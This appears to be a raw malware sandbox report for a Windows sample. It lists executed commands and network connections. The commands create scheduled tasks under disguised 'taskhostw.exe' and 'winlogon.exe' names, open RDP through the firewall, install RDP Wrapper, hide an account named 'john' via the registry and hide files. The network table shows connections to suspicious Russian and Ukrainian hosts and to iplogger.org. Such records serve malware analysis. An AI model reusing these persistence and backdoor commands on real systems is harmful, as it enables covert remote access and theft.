"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 5 /NOBREAK

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=5184,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7112 /prefetch:1

C:\Windows\SysWOW64\timeout.exe

TIMEOUT /T 3 /NOBREAK

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=7996,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:1

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM 1.exe /T /F

C:\Windows\SysWOW64\taskkill.exe

TASKKILL /IM P.exe /T /F

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=1220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=5488,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=3484,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=5240,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=7176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7024,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:1

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=8256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=8200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=6524,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=9164,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=8148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=7444,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=6156,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=6100,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8236 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=1972,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8536,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8532 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_mobsync.zip\mobsync.dll

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9192,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6012 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=7976,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8936 /prefetch:1

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Users\Admin\Downloads\Mabezat.exe

"C:\Users\Admin\Downloads\Mabezat.exe"

C:\Users\Admin\Downloads\Mabezat.exe

"C:\Users\Admin\Downloads\Mabezat.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8864,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=8572,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=8616,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8288 /prefetch:8

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7984,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8360 /prefetch:8

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.28.11:80 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 2.18.27.92:443 copilot.microsoft.com tcp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com udp
IT 184.51.127.32:443 msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com tcp
GB 2.18.27.82:443 www.bing.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
N/A 224.0.0.251:5353 udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
US 150.171.28.11:443 edge.microsoft.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
GB 2.18.27.82:443 www.bing.com udp
IE 23.216.155.137:443 www.bing.com tcp
US 8.8.8.8:53 ntp.msn.com udp
US 8.8.8.8:53 ntp.msn.com udp
US 204.79.197.203:443 ntp.msn.com tcp
US 204.79.197.203:443 ntp.msn.com tcp
US 8.8.8.8:53 assets.msn.com udp
US 8.8.8.8:53 assets.msn.com udp
IT 184.51.127.32:443 assets.msn.com tcp
IT 184.51.127.32:443 assets.msn.com tcp
IT 184.51.127.32:443 assets.msn.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 sb.scorecardresearch.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.msn.com udp
US 8.8.8.8:53 c.bing.com udp
US 8.8.8.8:53 c.bing.com udp
IE 23.216.155.169:443 www.bing.com tcp
IT 184.51.127.32:443 assets.msn.com udp
US 150.171.28.10:443 c.bing.com tcp
IE 13.74.129.1:443 c.msn.com tcp
GB 2.18.27.76:443 th.bing.com tcp
FR 13.249.9.46:443 sb.scorecardresearch.com tcp
IT 88.221.111.90:443 img-s-msn-com.akamaized.net tcp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
IT 88.221.111.90:443 img-s-msn-com.akamaized.net udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 srtb.msn.com udp
US 8.8.8.8:53 srtb.msn.com udp
US 204.79.197.203:443 srtb.msn.com tcp
US 204.79.197.203:443 srtb.msn.com tcp
IE 23.216.155.169:443 www.bing.com udp
GB 2.18.27.76:443 th.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com tcp
GB 2.18.27.76:443 th.bing.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.74:443 login.microsoftonline.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.110.133:443 user-images.githubusercontent.com tcp
US 185.199.110.133:443 user-images.githubusercontent.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.114.21:443 collector.github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 140.82.114.21:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
GB 2.18.27.76:443 th.bing.com udp
IE 23.216.155.169:443 www.bing.com udp
IT 88.221.111.90:443 img-s-msn-com.akamaized.net udp
US 149.255.35.125:443 tcp
FR 51.178.195.151:443 tcp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 8.8.8.8:53 static.edge.microsoftapp.net udp
US 13.107.246.64:443 static.edge.microsoftapp.net tcp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-mobile-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 8.8.8.8:53 edge-cloud-resource-static.azureedge.net udp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 13.107.246.64:443 edge-cloud-resource-static.azureedge.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 2.16.55.12:80 msedge.b.tlu.dl.delivery.mp.microsoft.com tcp
FR 51.178.195.151:443 tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 deff.nelreports.net udp
US 8.8.8.8:53 deff.nelreports.net udp
IT 184.51.127.41:443 deff.nelreports.net tcp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
FR 51.77.7.204:443 tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
FR 51.77.7.204:443 tcp
FR 51.77.7.204:443 tcp
IE 2.19.176.96:443 www.bing.com udp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
FR 51.77.7.204:443 tcp
CA 51.222.39.81:443 tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
FR 51.77.7.204:443 tcp
CA 51.222.39.81:443 tcp
US 149.255.35.125:443 tcp
US 38.68.50.179:443 tcp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 boglogov.site udp
US 8.8.8.8:53 boglogov.site udp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 77.223.119.187:5655 rms-server.tektonit.ru tcp
US 38.68.50.179:443 tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.246.64:443 edgeassetservice.azureedge.net tcp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 freemail.freehost.com.ua udp
UA 194.0.200.251:465 freemail.freehost.com.ua tcp
US 8.8.8.8:53 msedge.b.tlu.dl.delivery.mp.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 51.77.7.204:443 tcp
FR 51.77.7.204:443 tcp
IE 23.216.155.155:443 www.bing.com udp
IE 23.216.155.155:443 www.bing.com tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
IE 23.216.155.139:443 th.bing.com udp
IE 23.216.155.170:443 r.bing.com udp
IE 23.216.155.139:443 th.bing.com udp
US 8.8.8.8:53 rewards.bing.com udp
US 8.8.8.8:53 rewards.bing.com udp
US 150.171.27.10:443 rewards.bing.com tcp
RU 109.248.203.81:21 tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.74:443 login.microsoftonline.com tcp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
GB 79.127.237.132:443 www.dll-files.com tcp
GB 79.127.237.132:443 www.dll-files.com tcp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
US 104.18.11.207:443 maxcdn.bootstrapcdn.com udp
GB 142.250.179.234:443 ajax.googleapis.com tcp
GB 142.250.179.234:443 ajax.googleapis.com tcp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 maxcdn.bootstrapcdn.com udp
GB 142.250.179.226:443 googleads.g.doubleclick.net udp
US 104.18.10.207:443 maxcdn.bootstrapcdn.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 172.217.169.46:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 172.217.169.46:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 www.google.co.uk udp
US 8.8.8.8:53 www.google.co.uk udp
US 216.239.32.36:443 region1.analytics.google.com tcp
BE 64.233.166.157:443 stats.g.doubleclick.net tcp
GB 142.250.178.3:443 www.google.co.uk udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 142.250.187.225:443 lh3.googleusercontent.com tcp
GB 172.217.169.46:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 www.dll-files.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
